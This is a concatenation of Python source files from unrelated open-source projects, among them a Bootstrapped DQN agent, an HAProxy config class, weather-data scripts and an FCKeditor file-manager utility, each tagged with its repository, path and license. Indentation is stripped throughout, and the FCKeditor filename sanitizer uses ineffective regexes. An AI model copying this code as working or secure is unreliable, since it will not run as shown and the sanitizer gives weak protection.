from .presenter import Presenter
from .entry_point import EntryPoint
| jdber1/opendrop | opendrop/mvp/__init__.py | Python | gpl-3.0 | 1,481 |
import sys
from services.housing import HouseTemplate
from engine.resources.scene import Point3D
def setup(housingTemplates):
houseTemplate = HouseTemplate("object/tangible/deed/city_deed/shared_cityhall_corellia_deed.iff", "object/building/player/city/shared_cityhall_corellia.iff", 0)
houseTemplate.addBuildingSign("object/tangible/sign/player/shared_house_address.iff", Point3D(1, 2, 3))
houseTemplate.addPlaceablePlanet("corellia")
houseTemplate.addPlaceablePlanet("talus")
houseTemplate.setDefaultItemLimit(400)
houseTemplate.setBaseMaintenanceRate(1000)
houseTemplate.setCivicStructure(True)
housingTemplates.put(houseTemplate.getDeedTemplate(), houseTemplate)
return | ProjectSWGCore/NGECore2 | scripts/houses/player_cityhall_corellia_style_01.py | Python | lgpl-3.0 | 688 |
# python3
# pylint: disable=g-bad-file-header
# Copyright 2019 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""A simple implementation of Bootstrapped DQN with prior networks.
References:
1. "Deep Exploration via Bootstrapped DQN" (Osband et al., 2016)
2. "Deep Exploration via Randomized Value Functions" (Osband et al., 2017)
3. "Randomized Prior Functions for Deep RL" (Osband et al, 2018)
Links:
1. https://arxiv.org/abs/1602.04621
2. https://arxiv.org/abs/1703.07608
3. https://arxiv.org/abs/1806.03335
Notes:
- This agent is implemented with TensorFlow 2 and Sonnet 2. For installation
instructions for these libraries, see the README.md in the parent folder.
- This implementation is potentially inefficient, as it does not parallelise
computation across the ensemble for simplicity and readability.
"""
import copy
from typing import Callable, NamedTuple, Optional, Sequence
from bsuite.baselines import base
from bsuite.baselines.utils import replay
import dm_env
from dm_env import specs
import numpy as np
import sonnet as snt
import tensorflow as tf
import tree
class BootstrappedDqn(base.Agent):
"""Bootstrapped DQN with additive prior functions."""
def __init__(
self,
obs_spec: specs.Array,
action_spec: specs.DiscreteArray,
ensemble: Sequence[snt.Module],
batch_size: int,
discount: float,
replay_capacity: int,
min_replay_size: int,
sgd_period: int,
target_update_period: int,
optimizer: snt.Optimizer,
mask_prob: float,
noise_scale: float,
epsilon_fn: Callable[[int], float] = lambda _: 0.,
seed: Optional[int] = None,
):
"""Bootstrapped DQN with additive prior functions."""
# Agent components.
self._ensemble = ensemble
self._forward = [tf.function(net) for net in ensemble]
self._target_ensemble = [copy.deepcopy(network) for network in ensemble]
self._num_ensemble = len(ensemble)
self._optimizer = optimizer
self._replay = replay.Replay(capacity=replay_capacity)
# Create variables for each network in the ensemble
for network in ensemble:
snt.build(network, (None, *obs_spec.shape))
# Agent hyperparameters.
self._num_actions = action_spec.num_values
self._batch_size = batch_size
self._sgd_period = sgd_period
self._target_update_period = target_update_period
self._min_replay_size = min_replay_size
self._epsilon_fn = epsilon_fn
self._mask_prob = mask_prob
self._noise_scale = noise_scale
self._rng = np.random.RandomState(seed)
self._discount = discount
# Agent state.
self._total_steps = tf.Variable(1)
self._active_head = 0
tf.random.set_seed(seed)
@tf.function
def _step(self, transitions: Sequence[tf.Tensor]):
"""Does a step of SGD for the whole ensemble over `transitions`."""
o_tm1, a_tm1, r_t, d_t, o_t, m_t, z_t = transitions
variables = tree.flatten(
[model.trainable_variables for model in self._ensemble])
with tf.GradientTape() as tape:
losses = []
for k in range(self._num_ensemble):
net = self._ensemble[k]
target_net = self._target_ensemble[k]
# Q-learning loss with added reward noise + half-in bootstrap.
q_values = net(o_tm1)
one_hot_actions = tf.one_hot(a_tm1, depth=self._num_actions)
train_value = tf.reduce_sum(q_values * one_hot_actions, axis=-1)
target_value = tf.stop_gradient(tf.reduce_max(target_net(o_t), axis=-1))
target_y = r_t + z_t[:, k] + self._discount * d_t * target_value
loss = tf.square(train_value - target_y) * m_t[:, k]
losses.append(loss)
loss = tf.reduce_mean(tf.stack(losses))
gradients = tape.gradient(loss, variables)
self._total_steps.assign_add(1)
self._optimizer.apply(gradients, variables)
# Periodically update the target network.
if tf.math.mod(self._total_steps, self._target_update_period) == 0:
for k in range(self._num_ensemble):
for src, dest in zip(self._ensemble[k].variables,
self._target_ensemble[k].variables):
dest.assign(src)
def select_action(self, timestep: dm_env.TimeStep) -> base.Action:
"""Select values via Thompson sampling, then use epsilon-greedy policy."""
if self._rng.rand() < self._epsilon_fn(self._total_steps.numpy()):
return self._rng.randint(self._num_actions)
# Greedy policy, breaking ties uniformly at random.
batched_obs = tf.expand_dims(timestep.observation, axis=0)
q_values = self._forward[self._active_head](batched_obs)[0].numpy()
action = self._rng.choice(np.flatnonzero(q_values == q_values.max()))
return int(action)
def update(
self,
timestep: dm_env.TimeStep,
action: base.Action,
new_timestep: dm_env.TimeStep,
):
"""Update the agent: add transition to replay and periodically do SGD."""
if new_timestep.last():
self._active_head = self._rng.randint(self._num_ensemble)
self._replay.add(
TransitionWithMaskAndNoise(
o_tm1=timestep.observation,
a_tm1=action,
r_t=np.float32(new_timestep.reward),
d_t=np.float32(new_timestep.discount),
o_t=new_timestep.observation,
m_t=self._rng.binomial(1, self._mask_prob,
self._num_ensemble).astype(np.float32),
z_t=self._rng.randn(self._num_ensemble).astype(np.float32) *
self._noise_scale,
))
if self._replay.size < self._min_replay_size:
return
if tf.math.mod(self._total_steps, self._sgd_period) == 0:
minibatch = self._replay.sample(self._batch_size)
minibatch = [tf.convert_to_tensor(x) for x in minibatch]
self._step(minibatch)
class TransitionWithMaskAndNoise(NamedTuple):
o_tm1: np.ndarray
a_tm1: base.Action
r_t: float
d_t: float
o_t: np.ndarray
m_t: np.ndarray
z_t: np.ndarray
class NetworkWithPrior(snt.Module):
"""Combines network with additive untrainable "prior network"."""
def __init__(self,
network: snt.Module,
prior_network: snt.Module,
prior_scale: float = 1.):
super().__init__(name='network_with_prior')
self._network = network
self._prior_network = prior_network
self._prior_scale = prior_scale
def __call__(self, inputs: tf.Tensor) -> tf.Tensor:
q_values = self._network(inputs)
prior_q_values = self._prior_network(inputs)
return q_values + self._prior_scale * tf.stop_gradient(prior_q_values)
def make_ensemble(num_actions: int,
num_ensemble: int = 20,
num_hidden_layers: int = 2,
num_units: int = 50,
prior_scale: float = 3.) -> Sequence[snt.Module]:
"""Convenience function to make an ensemble from flags."""
output_sizes = [num_units] * num_hidden_layers + [num_actions]
ensemble = []
for _ in range(num_ensemble):
network = snt.Sequential([
snt.Flatten(),
snt.nets.MLP(output_sizes),
])
prior_network = snt.Sequential([
snt.Flatten(),
snt.nets.MLP(output_sizes),
])
ensemble.append(NetworkWithPrior(network, prior_network, prior_scale))
return ensemble
def default_agent(
obs_spec: specs.Array,
action_spec: specs.DiscreteArray,
num_ensemble: int = 20,
) -> BootstrappedDqn:
"""Initialize a Bootstrapped DQN agent with default parameters."""
ensemble = make_ensemble(
num_actions=action_spec.num_values, num_ensemble=num_ensemble)
optimizer = snt.optimizers.Adam(learning_rate=1e-3)
return BootstrappedDqn(
obs_spec=obs_spec,
action_spec=action_spec,
ensemble=ensemble,
batch_size=128,
discount=.99,
replay_capacity=10000,
min_replay_size=128,
sgd_period=1,
target_update_period=4,
optimizer=optimizer,
mask_prob=0.5,
noise_scale=0.0,
epsilon_fn=lambda t: 10 / (10 + t),
seed=42,
)
| deepmind/bsuite | bsuite/baselines/tf/boot_dqn/agent.py | Python | apache-2.0 | 8,645 |
import logging
from ..directives import directives_by_section
logger = logging.getLogger(__name__)
class Stanza(object):
"""
Subclass for config file stanzas.
In an HAProxy config file, a stanza is in the form of::
stanza header
directive
directive
directive
Stanza instances have a `header` attribute for the header and a list of
`lines`, one for each directive line.
"""
def __init__(self, section_name):
self.section_name = section_name
self.header = section_name
self.lines = []
def add_lines(self, lines):
"""
Simple helper method for adding multiple lines at once.
"""
for line in lines:
self.add_line(line)
def add_line(self, line):
"""
Adds a given line string to the list of lines, validating the line
first.
"""
if not self.is_valid_line(line):
logger.warn(
"Invalid line for %s section: '%s'",
self.section_name, line
)
return
self.lines.append(line)
def is_valid_line(self, line):
"""
Validates a given line against the associated "section" (e.g. 'global'
or 'frontend', etc.) of a stanza.
If a line represents a directive that shouldn't be within the stanza
it is rejected. See the `directives.json` file for a condensed look
at valid directives based on section.
"""
adjusted_line = line.strip().lower()
return any([
adjusted_line.startswith(directive)
for directive in directives_by_section[self.section_name]
])
def __str__(self):
"""
Returns the string representation of a Stanza, meant for use in
config file content.
if no lines are defined an empty string is returned.
"""
if not self.lines:
return ""
return self.header + "\n" + "\n".join([
"\t" + line
for line in self.lines
])
| wglass/lighthouse | lighthouse/haproxy/stanzas/stanza.py | Python | apache-2.0 | 2,087 |
#!/usr/bin/env python
"""
Background:
--------
NARR_RetrieveLocation_Variable.py
Purpose:
--------
Routines to retrieve, output NARR data from a single point over time to combine for analysis
History:
--------
2016-09-20 : Bell - simplify existing multiple routines for various locations into one package
"""
#System Stack
import datetime
import sys
#Science Stack
import numpy as np
from netCDF4 import num2date
#User Stack
from io_utils.EcoFOCI_netCDF_read import EcoFOCI_netCDF
from calc.EPIC2Datetime import EPIC2Datetime, get_UDUNITS, Datetime2EPIC
import calc.haversine as sphered
__author__ = 'Shaun Bell'
__email__ = 'shaun.bell@noaa.gov'
__created__ = datetime.datetime(2016, 9, 20)
__modified__ = datetime.datetime(2016, 9, 20)
__version__ = "0.1.0"
__status__ = "Development"
__keywords__ = 'NARR'
"---"
def rotate_coord(angle_rot, mag, dir):
""" converts math coords to along/cross shelf.
+ onshore / along coast with land to right (right handed)
- offshore / along coast with land to left
Todo: convert met standard for winds (left handed coordinate system
"""
dir = dir - angle_rot
along = mag * np.sin(np.deg2rad(dir))
cross = mag * np.cos(np.deg2rad(dir))
return (along, cross)
def triangle_smoothing(data_in):
weights=np.array([0.25,0.5,0.25])
filtered_data = np.convolve(data_in,np.array(weights),'same') #edge effects
return filtered_data
def from_netcdf_1dsplice(infile, height_ind, lat_ind, lon_ind):
""" Uses ncreadfile_dic which returns a dictionary of all data from netcdf"""
###nc readin/out
df = EcoFOCI_netCDF(infile)
nchandle = df._getnchandle_()
params = df.get_vars() #gets all of them
print "Parameters available: "
#print params
ncdata = ncreadfile_dic_slice(nchandle, params, height_ind=height_ind, lat_ind=lat_ind, lon_ind=lon_ind)
df.close()
return ncdata
def get_geocoords(infile, lat='lat', lon='lon'):
df = EcoFOCI_netCDF(infile)
nchandle = df._getnchandle_()
data = {}
for j, v in enumerate([lat, lon]):
data[v] = nchandle.variables[v][:]
df.close()
return (data)
def ncreadfile_dic_slice(nchandle, params, height_ind=None, lat_ind=None, lon_ind=None):
"""returns slice of data for all times but for specified height/lat/lon indicies"""
data = {}
if height_ind == None:
for j, v in enumerate(params):
try: #check for nc variable
data[v] = nchandle.variables[v][:,lat_ind,lon_ind]
except ValueError: #if parameter is not of expected dimensions
data[v] = nchandle.variables[v][:]
else:
for j, v in enumerate(params):
try: #check for nc variable
data[v] = nchandle.variables[v][:,:,lat_ind,lon_ind]
except ValueError: #if parameter is not of expected dimensions
data[v] = nchandle.variables[v][:]
return data
"""--------------------------------main Routines---------------------------------------"""
""" currently hard coded - variables and ranges """
### Grab grid points for future slicing - assume grid is same in all model output
NARR = '/Volumes/WDC_internal/Users/bell/Data_Local/Reanalysis_Files/NARR/daily/'
infile = [NARR + 'uwnd.10m.2016.nc']
lat_lon = get_geocoords(infile[0])
#stn ['1','2']
station_name = ['UP stn_1']
sta_lat = [54.5]
sta_long = [161.0]
#Find NARR nearest point to moorings - haversine formula
# NARR data is -180->180 (positive east), Moorings are usually expressed +W for FOCI
station_1 = sphered.nearest_point([sta_lat[0],-1 * sta_long[0]],lat_lon['lat'],lat_lon['lon'], '2d')
stn1_modelpt = [lat_lon['lat'][station_1[3],station_1[4]],lat_lon['lon'][station_1[3],station_1[4]]]
print "stn1 nearest point to %s, %s which is lat:%s , lon:%s" \
% (sta_lat[0], sta_long[0], stn1_modelpt[0], stn1_modelpt[1])
"""
#loop over all requested data
years = range(2010,2017)
years = ['mon.mean']
for yy in years:
# retrieve only these location's data
# uwnd
infile = NARR + 'uwnd.10m.'+ str(yy) + '.nc'
print "Working on file " + infile
stn1_data = from_netcdf_1dsplice(infile, None, station_1[3], station_1[4])
#filter data
stn1u_f = triangle_smoothing(stn1_data['uwnd'])
stn1u = stn1_data['uwnd']
# retrieve only these location's data
# vwnd
infile = NARR + 'vwnd.10m.'+ str(yy) + '.nc'
print "Working on file " + infile
stn1_data = from_netcdf_1dsplice(infile, None, station_1[3], station_1[4])
#filter data
stn1v_f = triangle_smoothing(stn1_data['vwnd'])
stn1v = stn1_data['vwnd']
#convert to EPIC time
#epic_time, epic_time1 = Datetime2EPIC(num2date(stn1_data['time'], "hours since 1800-1-1 00:00:0.0"))
Datetime2EPIC(num2date(x, "hours since 1800-1-1 00:00:0.0")) for x in stn1_data['time']
###
#output 0,6,12,18 UTC
#subsample data
# time_ind = np.where(pydate%0.25 == 0)[0]
# output u,v wind components from model grid points
save_to_nc = False
if save_to_nc:
# write to NetCDF
outfile = 'data/NARR_stn1_' + str(yy) + '.nc'
print "Writing to Epic NetCDF " + outfile
# write2epic( outfile, station_name[1], [epic_time[time_ind], epic_time1[time_ind]], stn1_modelpt, [stn1u_f[time_ind], stn1v_f[time_ind]])
write2epic( outfile, station_name[1], [epic_time, epic_time1], stn1_modelpt, [stn1u, stn1v])
"""
"""-----------using xarray---------"""
import pandas as pd
import xarray as xa
#index = [station_1[3],station_1[4]]
index=[195,76]
ufilein='/Volumes/WDC_internal/Users/bell/Data_Local/Reanalysis_Files/NARR/daily/uwnd.10m.2016.nc'
udata = xa.open_dataset(ufilein, decode_cf=False)
udata = xa.decode_cf(udata,mask_and_scale=False)
dum = udata.uwnd[:443,195,76].resample('D', udata.time, how='mean')
print dum.to_pandas().to_csv()
vfilein='/Volumes/WDC_internal/Users/bell/Data_Local/Reanalysis_Files/NARR/daily/vwnd.10m.2016.nc'
vdata = xa.open_dataset(vfilein, decode_cf=False)
vdata = xa.decode_cf(vdata,mask_and_scale=False)
dvm = vdata.vwnd[:443,195,76].resample('D', vdata.time, how='mean')
print dvm.to_pandas().to_csv()
| shaunwbell/FOCI_Analysis | ReanalysisRetrieval/NARR_RetrieveLocation_Variable.py | Python | mit | 6,281 |
'''
Project Euler - Problem 71
Consider the fraction, n/d, where n and d are positive integers. If n<d and
HCF(n,d)=1, it is called a reduced proper fraction.
If we list the set of reduced proper fractions for d<=8 in ascending order of
size, we get:
1/8, 1/7, 1/6, 1/5, 1/4, 2/7, 1/3, 3/8, 2/5, 3/7, 1/2, 4/7, 3/5, 5/8, 2/3, 5/7,
3/4, 4/5, 5/6, 6/7, 7/8
It can be seen that 2/5 is the fraction immediately to the left of 3/7.
By listing the set of reduced proper fractions for d<=1,000,000 in ascending
order of size, find the numerator of the fraction immediately to the left of
3/7.
'''
from math import ceil
#return the prime factors of a number
#second argument 'all' is a boolean
#saying if all instances of a repeated
#prime should be returned, e.g.:
# factors(12, True) = [3, 2, 2]
# factors(12, False) = [3, 2]
def primeFactors(n, all):
if n == 1: return [1]
i = 2
limit = n**0.5
while i <= limit:
if n % i == 0:
ret = primeFactors(n/i,all)
if all: ret.append(i)
elif not i==ret[-1]: ret.append(i)
return ret
i += 1
return [n]
#main
target_n = 3
target_d = 7
max_d = 1000000
#Idea: we want to be smaller than and as close as possible to 3/7.
#The smallest steps occurs for the largest denominators d.
#Algotithm is:
# 1- assuming the max d, 1000000
# 2- calculate n such that n/d<=3/7
# 3- if n/d is a proper fraction, stop, answer found.
# 4- if not, reduce n by 1 and repeat step 2.
# ###
# calculates the maximum numerator for which n/d<3/7, d=1000000
max_n = max_d * target_n/target_d
# now iterates n<max_n and finds a d<max_d
# which result in a proper fraction
n=max_n
while n>1:
d=int(ceil(float(n)*target_d/target_n))
#check is n/d is proper fraction
if set(primeFactors(n,False)).intersection(
set(primeFactors(d,False)))==set():
print n
break
n-=1
#output
# 428570
| haphaeu/yoshimi | EulerProject/071.py | Python | lgpl-3.0 | 1,944 |
# coding=utf-8
# Copyright 2022 The Edward2 Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defined utility functions for attentive uncertainty models.
"""
import tensorflow.compat.v1 as tf
def mse(y_true, y_pred_dist, reduction='mean'):
"""Returns the mean squared error for a predictive distribution.
Args:
y_true: (float) Tensor of target labels.
y_pred_dist: An edward2 distribution object.
reduction: (string) Either 'sum' or 'mean'.
"""
if reduction == 'sum':
return tf.reduce_sum(
tf.squared_difference(y_true,
y_pred_dist.distribution.mean()))
else:
return tf.losses.mean_squared_error(y_true,
y_pred_dist.distribution.mean())
def nll(y_true, y_pred_dist, reduction='mean'):
"""Returns the negative log-likelihood of a model w.r.t. true targets.
Args:
y_true: (float) Tensor of target labels.
y_pred_dist: An edward2 distribution object.
reduction: (string) Either 'sum' or 'mean'.
"""
log_p = y_pred_dist.distribution.log_prob(y_true)
if reduction == 'sum':
return -tf.reduce_sum(log_p)
else:
return -tf.reduce_mean(log_p)
def mlp_block(in_dim, hidden_sizes, activation=tf.nn.relu):
"""Return keras sequential MLP object for the final axis of a 2/3D tensor.
Args:
in_dim: (int) Input dimension for final axis.
hidden_sizes: (list of ints) An iterable containing the output sizes of the
MLP as defined in `basic.Linear`.
activation: (callable) Activation applied to all but the final layer.
Returns:
tensor of shape [B, n, d_out] where d_out = hidden_sizes[-1]
"""
net = tf.keras.Sequential([tf.keras.layers.InputLayer(in_dim)])
for size in hidden_sizes[:-1]:
net.add(tf.keras.layers.Dense(size, activation=activation))
net.add(tf.keras.layers.Dense(hidden_sizes[-1], activation=None))
return net
@tf.function
def train_step(model, data, optimizer_config, is_mse=False):
"""Applies gradient updates and returns appropriate metrics.
Args:
model: An instance of SNP Regressor.
data: A 5-tuple consisting of context_x, context_y, target_x, target_y,
unseen_targets (i.e., target_x-context_x).
optimizer_config: A dictionary with two keys: an 'optimizer' object and
a 'max_grad_norm' for clipping gradients.
is_mse: Use mse (fixed variance) if True else use nll.
Returns:
nll_term: Negative log-likelihood assigned by model to unseen targets.
mse_term: Mean squared error of model for unseen targets.
local_kl: KL loss for latent variables of unseen targets.
global_kl: KL loss for global latent variable.
"""
context_x, context_y, target_x, target_y, unseen_targets = data
num_context = tf.shape(context_x)[1]
with tf.GradientTape() as tape:
prediction = model(
context_x,
context_y,
target_x,
target_y)
unseen_predictions = prediction[:, num_context:]
nll_term = nll(unseen_targets, unseen_predictions)
mse_term = mse(unseen_targets, unseen_predictions)
loss = mse_term if is_mse else nll_term
if model.local_variational:
local_kl = tf.reduce_mean(
tf.reduce_sum(model.losses[-1][:, num_context:], axis=[1, 2]))
else:
local_kl = 0.
global_kl = tf.reduce_mean(tf.reduce_sum(model.losses[-2], axis=-1))
loss += local_kl + global_kl
gradients = tape.gradient(loss, model.trainable_variables)
max_grad_norm = optimizer_config['max_grad_norm']
optimizer = optimizer_config['optimizer']
clipped_gradients, _ = tf.clip_by_global_norm(gradients, max_grad_norm)
optimizer.apply_gradients(zip(clipped_gradients, model.trainable_variables))
return nll_term, mse_term, local_kl, global_kl
@tf.function
def train_gnp_step(model, data, optimizer_config, is_mse=False):
"""Applies gradient updates and returns appropriate metrics.
Args:
model: An instance of GNP Regressor.
data: A 5-tuple consisting of context_x, context_y, target_x, target_y,
unseen_targets (i.e., target_x-context_x).
optimizer_config: A dictionary with two keys: an 'optimizer' object and
a 'max_grad_norm' for clipping gradients.
is_mse: Use mse (fixed variance) if True else use nll.
Returns:
nll_term: Negative log-likelihood assigned by model to unseen targets.
mse_term: Mean squared error of model for unseen targets.
local_kl: KL loss for latent variables of unseen targets.
global_kl: KL loss for global latent variable.
"""
context_x, context_y, target_x, target_y, unseen_targets = data
num_context = tf.shape(context_x)[1]
with tf.GradientTape() as tape:
prediction = model(
context_x,
context_y,
target_x,
target_y)
unseen_predictions = prediction[:, num_context:]
nll_term = nll(unseen_targets, unseen_predictions)
mse_term = mse(unseen_targets, unseen_predictions)
loss = mse_term if is_mse else nll_term
local_kl = tf.reduce_mean(
tf.reduce_sum(model.losses[-1][:, num_context:], axis=[1, 2]))
global_kl = tf.reduce_mean(tf.reduce_sum(model.losses[-2], axis=-1))
loss += local_kl + global_kl
gradients = tape.gradient(loss, model.trainable_variables)
max_grad_norm = optimizer_config['max_grad_norm']
optimizer = optimizer_config['optimizer']
clipped_gradients, _ = tf.clip_by_global_norm(gradients, max_grad_norm)
optimizer.apply_gradients(zip(clipped_gradients, model.trainable_variables))
return nll_term, mse_term, local_kl, global_kl
| google/edward2 | experimental/attentive_uncertainty/utils.py | Python | apache-2.0 | 6,033 |
from django import forms
from django.utils.translation import ugettext_lazy as _
#import settings
from cmsplugin_contact.nospam.forms import HoneyPotForm, RecaptchaForm, AkismetForm
class ContactForm(forms.Form):
email = forms.EmailField(label=_("Email"))
subject = forms.CharField(label=_("Subject"), required=False)
content = forms.CharField(label=_("Content"), widget=forms.Textarea())
template = "cmsplugin_contact/contact.html"
class HoneyPotContactForm(HoneyPotForm):
pass
class AkismetContactForm(AkismetForm):
akismet_fields = {
'comment_author_email': 'email',
'comment_content': 'content'
}
akismet_api_key = None
class RecaptchaContactForm(RecaptchaForm):
recaptcha_public_key = None
recaptcha_private_key = None
recaptcha_theme = None
| wlanslovenija/cmsplugin-contact | cmsplugin_contact/forms.py | Python | bsd-2-clause | 821 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009 Zuza Software Foundation
#
# This file is part of Pootle.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import patterns
urlpatterns = patterns('pootle_terminology.views',
(r'^(?P<language_code>[^/]*)/(?P<project_code>[^/]*)/terminology_extract.html',
'extract'),
(r'^(?P<language_code>[^/]*)/(?P<project_code>[^/]*)/terminology_manage.html',
'manage'),
(r'^(?P<language_code>[^/]*)/(?P<project_code>[^/]*)/(?P<path>.*?)/terminology_manage.html',
'manage'),
)
| ttreeagency/PootleTypo3Org | pootle/apps/pootle_terminology/urls.py | Python | gpl-2.0 | 1,173 |
# -*- coding: utf-8 -*-
"""
fixtures.py
This module is for storing all of the relavant fixtures used in testing.
"""
from .fixtures_data import (
JSON15min2day,
two_sites_two_params_iv,
nothing_avail,
mult_flags,
diff_freq,
startDST,
endDST,
)
from .fixtures_daily_dupe import daily_dupe, daily_dupe_altered
from .fixtures_multiple_methods import multi_meth
from .fixtures_tzfail import tzfail
from .fixtures_recent_only import recent_only
from .fixtures_usgs_rdb import (
field_fixture,
rating_fixture,
peaks_fixture,
parsing_error_fixture,
)
class fakeResponse(object):
def __init__(
self,
code=200,
url="fake url",
reason="fake reason",
text="fake text",
json=JSON15min2day,
):
self.status_code = code
self.url = url
self.reason = reason
self.text = text
# .json will return a function
# .json() will return JSON15min2day
self.json = lambda: json
if self.status_code == 200:
self.ok = True
else:
self.ok = False
def raise_for_status(self):
return self.status_code
| mroberge/hydrofunctions | tests/fixtures.py | Python | mit | 1,184 |
#!/usr/bin/env python
"""
FCKeditor - The text editor for Internet - http://www.fckeditor.net
Copyright (C) 2003-2009 Frederico Caldeira Knabben
== BEGIN LICENSE ==
Licensed under the terms of any of the following licenses at your
choice:
- GNU General Public License Version 2 or later (the "GPL")
http://www.gnu.org/licenses/gpl.html
- GNU Lesser General Public License Version 2.1 or later (the "LGPL")
http://www.gnu.org/licenses/lgpl.html
- Mozilla Public License Version 1.1 or later (the "MPL")
http://www.mozilla.org/MPL/MPL-1.1.html
== END LICENSE ==
Utility functions for the File Manager Connector for Python
"""
import string, re
import os
import config as Config
# Generic manipulation functions
def removeExtension(fileName):
index = fileName.rindex(".")
newFileName = fileName[0:index]
return newFileName
def getExtension(fileName):
index = fileName.rindex(".") + 1
fileExtension = fileName[index:]
return fileExtension
def removeFromStart(string, char):
return string.lstrip(char)
def removeFromEnd(string, char):
return string.rstrip(char)
# Path functions
def combinePaths( basePath, folder ):
return removeFromEnd( basePath, '/' ) + '/' + removeFromStart( folder, '/' )
def getFileName(filename):
" Purpose: helper function to extrapolate the filename "
for splitChar in ["/", "\\"]:
array = filename.split(splitChar)
if (len(array) > 1):
filename = array[-1]
return filename
def sanitizeFolderName( newFolderName ):
"Do a cleanup of the folder name to avoid possible problems"
# Remove . \ / | : ? * " < > and control characters
return re.sub( '(?u)\\.|\\\\|\\/|\\||\\:|\\?|\\*|"|<|>|[^\u0000-\u001f\u007f-\u009f]', '_', newFolderName )
def sanitizeFileName( newFileName ):
"Do a cleanup of the file name to avoid possible problems"
# Replace dots in the name with underscores (only one dot can be there... security issue).
if ( Config.ForceSingleExtension ): # remove dots
newFileName = re.sub ( '/\\.(?![^.]*$)/', '_', newFileName ) ;
newFileName = newFileName.replace('\\','/') # convert windows to unix path
newFileName = os.path.basename (newFileName) # strip directories
# Remove \ / | : ? *
return re.sub ( '(?u)/\\\\|\\/|\\||\\:|\\?|\\*|"|<|>|[^\u0000-\u001f\u007f-\u009f]/', '_', newFileName )
def getCurrentFolder(currentFolder):
if not currentFolder:
currentFolder = '/'
# Check the current folder syntax (must begin and end with a slash).
if (currentFolder[-1] <> "/"):
currentFolder += "/"
if (currentFolder[0] <> "/"):
currentFolder = "/" + currentFolder
# Ensure the folder path has no double-slashes
while '//' in currentFolder:
currentFolder = currentFolder.replace('//','/')
# Check for invalid folder paths (..)
if '..' in currentFolder or '\\' in currentFolder:
return None
return currentFolder
def mapServerPath( environ, url):
" Emulate the asp Server.mapPath function. Given an url path return the physical directory that it corresponds to "
# This isn't correct but for the moment there's no other solution
# If this script is under a virtual directory or symlink it will detect the problem and stop
return combinePaths( getRootPath(environ), url )
def mapServerFolder(resourceTypePath, folderPath):
return combinePaths ( resourceTypePath , folderPath )
def getRootPath(environ):
"Purpose: returns the root path on the server"
# WARNING: this may not be thread safe, and doesn't work w/ VirtualServer/mod_python
# Use Config.UserFilesAbsolutePath instead
if environ.has_key('DOCUMENT_ROOT'):
return environ['DOCUMENT_ROOT']
else:
realPath = os.path.realpath( './' )
selfPath = environ['SCRIPT_FILENAME']
selfPath = selfPath [ : selfPath.rfind( '/' ) ]
selfPath = selfPath.replace( '/', os.path.sep)
position = realPath.find(selfPath)
# This can check only that this script isn't run from a virtual dir
# But it avoids the problems that arise if it isn't checked
raise realPath
if ( position < 0 or position <> len(realPath) - len(selfPath) or realPath[ : position ]==''):
raise Exception('Sorry, can\'t map "UserFilesPath" to a physical path. You must set the "UserFilesAbsolutePath" value in "editor/filemanager/connectors/py/config.py".')
return realPath[ : position ]
| Goutte/Ni | v1/web/apostrophePlugin/web/js/fckeditor/editor/filemanager/connectors/py/fckutil.py | Python | gpl-2.0 | 4,235 |
############################################################################
##
## Copyright (C) 2006-2008 University of Utah. All rights reserved.
##
## This file is part of VisTrails.
##
## This file may be used under the terms of the GNU General Public
## License version 2.0 as published by the Free Software Foundation
## and appearing in the file LICENSE.GPL included in the packaging of
## this file. Please review the following to ensure GNU General Public
## Licensing requirements will be met:
## http://www.opensource.org/licenses/gpl-license.php
##
## If you are unsure which license is appropriate for your use (for
## instance, you are interested in developing a commercial derivative
## of VisTrails), please contact us at contact@vistrails.org.
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
############################################################################
""" Do not edit this file!
File automatically generated by scripts/gen_init.py
Change History:
version : description
0.2 : Integrated quickplot module that displays the CDAT plot
widget inside the spreadsheet
0.1 : First automatically generated package based on xml descriptions
"""
from PyQt4 import QtCore, QtGui
import sip
import core.modules
import core.modules.module_registry
from core.modules.vistrails_module import (Module, NotCacheable,
ModuleError, new_module)
from core.bundles import py_import
import os, sys
#cdat specific packages
vcs = py_import('vcs',{})
cdms2 = py_import('cdms2', {})
cdutil = py_import('cdutil', {})
#local python modules
from cdat_window import QCDATWindow
from cdat_cell import QCDATWidget
from quickplot import quickplot | Nikea/VisTrails | contrib/cdat/scripts/init_inc.py | Python | bsd-3-clause | 1,823 |
#!/usr/bin/env python3
'''Khronos OpenGL colorspace extension for EGL.
This extension allows OpenGL and OpenGL ES surfaces to use the sRGB
and linear colorspaces that are already available to OpenVG.
http://www.khronos.org/registry/egl/extensions/KHR/EGL_KHR_gl_colorspace.txt
'''
# Copyright © 2014 Tim Pederick.
#
# This file is part of Pegl.
#
# Pegl is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pegl is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details.
#
# You should have received a copy of the GNU General Public License
